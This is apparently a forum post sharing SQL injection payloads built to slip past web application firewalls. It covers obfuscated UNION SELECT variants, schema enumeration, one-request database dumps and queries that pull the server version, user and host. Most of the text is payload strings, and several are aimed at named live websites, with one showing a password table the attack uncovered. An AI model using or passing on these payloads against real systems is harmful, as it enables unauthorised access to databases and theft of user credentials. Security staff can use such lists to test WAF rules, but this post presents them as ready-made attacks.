AF evasion methods for sql Injections I want to share WAF evasion methods for sql Injections. Most are old but few are newer. You can bypass most of the "404 forbidden" and "NOT Acceptable" errors by these methods. 1) id=1+UnIoN+SeLecT 1,2,3 --+ 2) id=1+UnIOn/**/SeLect 1,2,3 --+ 3) id=1+UNIunionON+SELselectECT 1,2,3 --+ 4) id=1+/*!UnIOn*/+/*!sElEcT*/ 1,2,3 --+ 5) id=1 and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT 1,2,3 --+ 6) id=1+%23hihihi%0aUnIOn%23hihihi%0aSeLecT+1,2 ,3 --+ 7) id=1+UnIOn%0d%0aSeleCt%0d%0a1,2,3 --+ 8) Id=1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C1,2,3 --+ /*!fuckU%0d%0aunion*/+/*!fuckU%0d%0aSelEct*/ 1,2,3 --+ 9) Id=1/*!fuckU%0d%0aunion*/+/*!fuckU%0d%0aSelEct*/ 1,2,3 --+ div + 0 Having +1 = 0 AND+ 1 = 0 /*!and*/ +1 = 0 and( 1 )=(0 ) x OR false the url query id =- 1 union all select id =null union all select id =1 +and+ false + union +all +select id = 9999 union all select +union+distinct+select+ +union+distinctROW+select+ /**//*!12345UNION SELECT*//**/ /**//*!50000UNION SELECT*// http : //www.phm.ie/project.php?cat=Conservation' +and(1)=(0) +union+distinct+select+ 1 and use: and 1=0 to apear column number in the page or +div+0 Having+1=0 +AND+1=0 +/*!and*/+1=0 and(1)=(0) Hard WAF bypass tips Whitespaces : union(select(0),version(),(0),(0),(0),(0),(0),(0), (0)) %0Aunion%0Aselect%0A1,2,3-- /**/union/**/select/**/1,2,3-- like :: PHP Code: http ://www.goavenues.com/ list_itinerary.php?id=-4%20union %20%28select%201,2,version %28%29,4,5,6,7,8%29%20-- =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=- NICE QUERY www.zerocoolhf.altervista.org/level2.php?id=-1'union+select*from(select+1)a+join(select'%3Cfont+color=red+font+face=vardana%3EMr_7un47!5%3C/font%3E')b+join+(select+version())c--+ www.zerocoolhf.altervista.org/level1.php?id=-1'%0AUunioNIOn%0AsELeCT%0A1,VERSION(),3%23 =-=-=-=-=-=-=-=-=-=-=-=-=-=- Bypassing :: (Double Keyword): UNIunionON+SELselectECT +union+distinct+select+ +union+distinctROW+select+ union+/*!select*/+1,2,3 
union/**/select/**/1,2,3 uni<on all sel<ect %20union%20/*!select*/%20 /**//*!union*//**//*!select*//**/ union%23aa%0Aselect /**/union/*!50000select*/ /*!20000%0d%0aunion*/+/*!20000%0d %0aSelEct*/ %252f%252a*/UNION%252f%252a /SELECT%252f %252a*/ +%23sexsexsex%0AUnIOn%23sexsexsex %0ASeLecT+ id=1+’UnI”On’+'SeL”ECT’ <-MySQL only id=1+'UnI'||'on'+SeLeCT' <-MSSQL only like :: PHP Code: http ://www.goavenues.com/ list_itinerary.php?id=-4%20union %23aa%0Aselect%201,2,version %28%29,4,5,6,7,8%20-- PHP Code: http ://www.goavenues.com/ list_itinerary.php?id=-4%20/**/ union/*!50000select*/ %201,2,version %28%29,4,5,6,7,8%20-- PHP Code: http ://www.goavenues.com/ list_itinerary.php?id=-4%20/*! 20000%0d%0aunion*/+/*!20000%0d %0aSelEct*/%201,2,version %28%29,4,5,6,7,8%20-- =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=- =-=-=-=-=-=-=-=-=-=-=-=-=-=- after id no. like id=1 +/*!and*/+1=0 +div+0 Having+1=0 +AND+1=0 +/*!and*/+1=0 and(1)=(0) =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=- =-=-=-=-=-=-=-=-=-=-=-=-=-=- false the url query : =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=- =-=-=-=-=-=-=-=-=-=-=-=-=-=- id= - 1 union all select id= null union all select id=1 +and+false+ union+all+select id= 9999 union all select =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=- =-=-=-=-=-=-=-=-=-=-=-=-=-=- Order Bypassing do like this =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=- =-=-=-=-=-=-=-=-=-=-=-=-=-=- /*!table_name*/ +from /*!information_schema*/./*!tables*/ where table_schema=database() =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=- =-=-=-=-=-=-=-=-=-=-=-=-=-=- unhex(hex(Concat (Column_Name,0x3e,Table_schema,0x3e,table_ Name))) /*!from*/information_schema.columns/*!where*/ column_name%20/*!like*/char(37,%20112,%2097, %20115,%20115,%2037) like :: PHP Code: http ://www.westbury.com/ article.php? article_id=-117%20union%20select %201,2,unhex%28hex%28Concat %28Column_Name,0x3e,Table_ schema, 0x3e,table_Name %29%29%29,4,5,6,7/*!from*/ information_schema.columns/*! 
where*/column_name%20/*!like*/ char%2837,%20112,%2097,%20115, %20115,%2037%29-- user_passwd>westbur6_website>user_info =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=- =-=-=-=-=-=-=-=-=-=-=-=-=-=- used with order :: convert( using ascii) or unhex(hex()) like : PHP Code: www. westbury. com/ article. php? article_id =- 117 union select 1 , 2 , convert ( group_concat (table_name ) using ascii ), 4 , 5 ,6 , 7 + from +information_schema .tables -- IF'ascii' dosent work? you can try PHP Code: ujis ucs2 tis620 swe7 sjis macroman macce latin7 latin5 latin2 koi8u koi8r keybcs2 hp8 geostd8 gbk gb2132 armscii8 ascii binary cp1250 big5 cp1251 cp1256 cp1257 cp850 ------------------------------Best Bypass WAF------------------------------------ [~] order by [~] /**/ORDER/**/BY/**/ /*!order*/+/*!by*/ /*!ORDER BY*/ /*!50000ORDER BY*/ /*!50000ORDER*//**//*!50000BY*/ /*!12345ORDER*/+/*!BY*/ [~] UNION select [~] /*!50000%55nIoN*/ /*!50000%53eLeCt*/ %55nion(%53elect 1,2,3)-- - +union+distinct+select+ +union+distinctROW+select+ /**//*!12345UNION SELECT*//**/ /**//*!50000UNION SELECT*//**/ /**/UNION/**//*!50000SELECT*//**/ /*!50000UniON SeLeCt*/ union /*!50000%53elect*/ + #?uNiOn + #?sEleCt + #?1q %0AuNiOn all#qa%0A#%0AsEleCt /*!%55NiOn*/ /*!%53eLEct*/ /*!u%6eion*/ /*!se%6cect*/ +un/**/ion+se/**/lect uni%0bon+se%0blect %2f**%2funion%2f**%2fselect union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A REVERSE(noinu)+REVERSE(tceles) /*--*/union/*--*/select/*--*/ union (/*!/**/ SeleCT */ 1,2,3) /*!union*/+/*!select*/ union+/*!select*/ /**/union/**/select/**/ /**/uNIon/**/sEleCt/**/ +%2F**/+Union/*!select*/ /**//*!union*//**//*!select*//**/ /*!uNIOn*/ /*!SelECt*/ +union+distinct+select+ +union+distinctROW+select+ uNiOn aLl sElEcT UNIunionON+SELselectECT /**/union/*!50000select*//**/ 0%a0union%a0select%09 %0Aunion%0Aselect%0A %55nion/**/%53elect uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/ %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/ %0A%09UNION%0CSELECT%10NULL% 
/*!union*//*--*//*!all*//*--*//*!select*/ union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/ +UnIoN/*&a=*/SeLeCT/*&a=*/ union+sel%0bect +uni*on+sel*ect+ +#1q%0Aunion all#qa%0A#%0Aselect union(select (1),(2),(3),(4),(5)) UNION(SELECT(column)FROM(table)) %23xyz%0AUnIOn%23xyz%0ASeLecT+ %23xyz%0A%55nIOn%23xyz%0A%53eLecT+ union(select(1),2,3) union (select 1111,2222,3333) uNioN (/*!/**/ SeleCT */ 11) union (select 1111,2222,3333) +#1q%0AuNiOn all#qa%0A#%0AsEleCt /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/ %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/ +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+ +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/ +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+ /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/ /union/sselect/g /union/s+select/i /*!UnIoN*/SeLeCT +UnIoN/*&a=*/SeLeCT/*&a=*/ +uni>on+sel>ect+ +(UnIoN)+(SelECT)+ +(UnI)(oN)+(SeL)(EcT) +’UnI”On’+'SeL”ECT’ +uni on+sel ect+ +/*!UnIoN*/+/*!SeLeCt*/+ /*!u%6eion*/ /*!se%6cect*/ uni%20union%20/*!select*/%20 union%23aa%0Aselect /**/union/*!50000select*/ /^.*union.*$/ /^.*select.*$/ /*union*/union/*select*/select+ /*uni X on*/union/*sel X ect*/ +un/**/ion+sel/**/ect+ +UnIOn%0d%0aSeleCt%0d%0a UNION/*&test=1*/SELECT/*&pwn=2*/ un?<ion sel="">+un/**/ion+se/**/lect+ +UNunionION+SEselectLECT+ +uni%0bon+se%0blect+ %252f%252a*/union%252f%252a /select%252f%252a*/ /%2A%2A/union/%2A%2A/select/%2A%2A/ %2f**%2funion%2f**%2fselect%2f**%2f union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A /*!UnIoN*/SeLecT+ [~] information_schema.tables [~] /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- - /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- - /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- - /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like 
database()-- - /*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table /*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table [~] concat() [~] CoNcAt() concat() CON%08CAT() CoNcAt() %0AcOnCat() /**//*!12345cOnCat*/ /*!50000cOnCat*/(/*!*/) unhex(hex(concat(table_name))) unhex(hex(/*!12345concat*/(table_name))) unhex(hex(/*!50000concat*/(table_name))) [~] group_concat() [~] /*!group_concat*/() gRoUp_cOnCAt() group_concat(/*!*/) group_concat(/*!12345table_name*/) group_concat(/*!50000table_name*/) /*!group_concat*/(/*!12345table_name*/) /*!group_concat*/(/*!50000table_name*/) /*!12345group_concat*/(/*!12345table_name*/) /*!50000group_concat*/(/*!50000table_name*/) /*!GrOuP_ConCaT*/() /*!12345GroUP_ConCat*/() /*!50000gRouP_cOnCaT*/() /*!50000Gr%6fuP_c%6fnCAT*/() unhex(hex(group_concat(table_name))) unhex(hex(/*!group_concat*/(/*!table_name*/))) unhex(hex(/*!12345group_concat*/(table_name))) unhex(hex(/*!12345group_concat*/(/*!table_name*/))) unhex(hex(/*!12345group_concat*/(/*!12345table_name*/))) unhex(hex(/*!50000group_concat*/(table_name))) unhex(hex(/*!50000group_concat*/(/*!table_name*/))) unhex(hex(/*!50000group_concat*/(/*!50000table_name*/))) convert(group_concat(table_name)+using+ascii) convert(group_concat(/*!table_name*/)+using+ascii) convert(group_concat(/*!12345table_name*/)+using+ascii) convert(group_concat(/*!50000table_name*/)+using+ascii) CONVERT(group_concat(table_name)+USING+latin1) CONVERT(group_concat(table_name)+USING+latin2) CONVERT(group_concat(table_name)+USING+latin3) CONVERT(group_concat(table_name)+USING+latin4) CONVERT(group_concat(table_name)+USING+latin5) Group_Concat group_concat () /*!group_concat*/ () grOUp_ConCat ( /*!*/ , 0x3e , /*!*/ ) group_concat (, 0x3c62723e ) g % 72oup_c % 6Fncat % 28 % 76% 65rsion % 28 %29 ,% 22 ~ BlackRose% 22 %29 CoNcAt () CONCAT (DISTINCT Version ()) concat (, 0x3a ,) concat %00 () % 00CoNcAt () /*!50000cOnCat*/ ( /*!Version()*/ ) 
/*!50000cOnCat*/ /**//*!12345cOnCat*/ (, 0x3a ,) concat_ws () concat (0x3a ,, 0x3c62723e ) /*!concat_ws(0x3a,)*/ concat_ws ( 0x3a3a3a , version() CONCAT_WS ( CHAR ( 32, 58, 32 ), version (),) REVERSE( tacnoc ) binary (version ()) uncompress (compress ( version())) aes_decrypt ( aes_encrypt ( version (), 1), 1 )[/ b ][/ u ][/ size ][/ color ] [~] after id no. like id=1 +/*!and*/+1=0 [~] +div+0 Having+1=0 +AND+1=0 +/*!and*/+1=0 and(1)=(0) cp852 cp866 cp932 dec8 euckr latin1 utf8 trick to appear info inside img tag PHP Code: concat( 0x223e3c62723e ,, 0x3c696d 67207372633d22 ) when the column is get into html tag,but its not always inside img tag. it could be <a> or </noscript> or anything. like :: PHP Code: http ://fzszy.chinacourt.org/ public/detail.php? id=-168' union /*! %53elect*/ concat (0x223e3c2f613e3c2f74643e, version (),0x3c6120687265663d22)--+ [DUMP DB in 1 Request] PHP Code: ( select (@) from ( select(@:= 0x00 ), ( select (@) from ( information_schema . columns) where ( table_schema >=@) and (@) in (@:= concat (@, 0x0a , ' [ ' ,table_schema , ' ] >' , table_name , ' > ' , column_name )))) x ) ( select(@) from ( select (@:= 0x00 ), ( select (@) from ( table ) where (@) in (@:= concat (@, 0x0a , column1 , 0x3a , column2 )))) a ) [DUMP DB in 1 Request improve] PHP Code: ( select(@ x ) from (select (@x := 0x00 ), ( select( 0 ) from ( information_schema . columns) where ( table_schema ! = 0x696e666f726d6174696f6e5f736368656d61 )and ( 0x00 ) in(@ x := concat (@ x ,0x3c62723e , table_schema , 0x2e , table_name , 0x3a , column_name )))) x ) like http : //www.marinaplast.com/page.php? id=-13 union select 1,2,(select (@x)from(select(@x:=0x00),(select (0)from(information_schema.colu mns)where(table_schema! =0x696e666f726d6174696f6e5f736368656d61)and (0x00)in(@x:=concat (@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4,5 -- WHITESPACES BYPASS . 
%09 %0A %0B %0C %0D %A0 get version - DB_NAME - user - HOST_NAME - datadir PHP Code: version() convert( version() using latin1 ) unhex ( hex( version())) @@GLOBAL. VERSION ( substr (@@version ,1 , 1 )=5 ) :: 1 true 0 fals # like # www. marinaplast. com/ page . php? id =- 13 union select 1 , 2 ,( substr (@@version ,1 , 1 )=5 ), 4, 5 -- 1 it 's mean version 5 and 0 mean version 4 +and substring(version(),1,1)=4 +and substring(version(),1,1)=5 +and substring(version(),1,1)=9 +and substring(version(),1,1)=10 # like # www.marinaplast.com/page.php? id=13+and substring(version (),1,1)=5 download good version 5 www.marinaplast.com/page.php? id=13+and substring(version (),1,1)=4 not download good version 4 version 5 id=1 /*!50094aaaa*/ error id=1 /*!50095aaaa*/ no error id=1 /*!50096aaaa*/ error # like # www.marinaplast.com/page.php?id=13 / *!50095aaaa*/ no error v5 version 4 id=1 /*!40123 1=1*/--+- no error id=1 /*!40122rrrr*/ no error # like # www.marinaplast.com/page.php?id=13 / *!40122rrrr*/ error not v4 ☆¸.•*☆ ☆*•.¸☆ DB_NAME() @@database database() id=vv() # like # www.marinaplast.com/page.php? id=-13 union select 1,2,DB_NAME (),4,5 -- www.marinaplast.com/page.php?id=vv () ☆¸.•*☆ ☆*•.¸☆ @@user user() user_name() system_user() # like # www.marinaplast.com/page.php? id=-13 union select 1,2,user (),4,5 -- ☆¸.•*☆ ☆*•.¸☆ HOST_NAME() @@hostname @@servername SERVERPROPERTY() # like # www.marinaplast.com/page.php? id=-13 union select 1,2,HOST_NAME (),4,5 -- ☆¸.•*☆ ☆*•.¸☆ @@datadir datadir() # like # www.marinaplast.com/page.php? id=-13 union select 1,2,datadir(),4,5 -- ☆¸.•*☆ ☆*•.¸☆ ASPX and 1=0/@@version ' and 1 =0 /@@ version;-- ) and 1 =@@version-- and 1 = 0 /user ;--